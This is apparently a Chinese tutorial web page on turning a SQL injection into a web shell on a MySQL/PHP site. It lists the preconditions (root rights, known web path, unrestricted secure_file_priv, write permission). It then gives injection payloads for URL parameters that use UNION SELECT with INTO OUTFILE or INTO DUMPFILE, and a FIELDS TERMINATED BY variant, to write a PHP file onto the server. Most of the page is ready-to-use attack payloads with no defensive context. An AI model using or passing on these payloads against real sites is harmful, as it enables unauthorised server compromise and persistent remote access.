当前位置：首页 > 工具软件 > SqlShell > 使用案例 >

SQL注入写shell权限

姜鸿

2023-12-01

SQL注入写shell权限

需要的条件

1. root权限
2. 知道网站的物理绝对路径
3. load_file() 开启 即 secure_file_priv 无限制 可以通过select @@secure_file_priv;查询
（1）：如果为NULL,则不能写入
（2）：如果为空，可以在任意文件位置下写入
（3）：如果为一个路径，可以在该文件路径写入
4. 有写入权限

联合写入

?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into outfile 'C:\info.php'%23
?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into dumpfile 'C:\info.php'%23

非联合写入

?id=1 into outfile '/var/lib/mysql-files/info.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

类似资料：

相关阅读

什么是SQL注入？SQL注入绕过mysql_real_escape_string（）在MySQL中创建/写入权限 sql注入之手工注入示例详解 Shell-将变量内容写入文件

相关文章

OpenCV写入图像 SQL的基本书写规则 Spring Bean属性注入 Google Guice 按需注入 Google Guice 可选注入

相关问答

Amazon Ec2 FTP写入权限[关闭]PHP站点的SQL注入如何提供索引的写入权限。在gulp中注入js和css时使用html？防止Node.js中的SQL注入防止SQL注入--mybatis和spring

相关文档

Shell 入门教程 SQL 入门教程 Shell 脚本编程 30 分钟入门 Shell 十三问 Shell 编程范例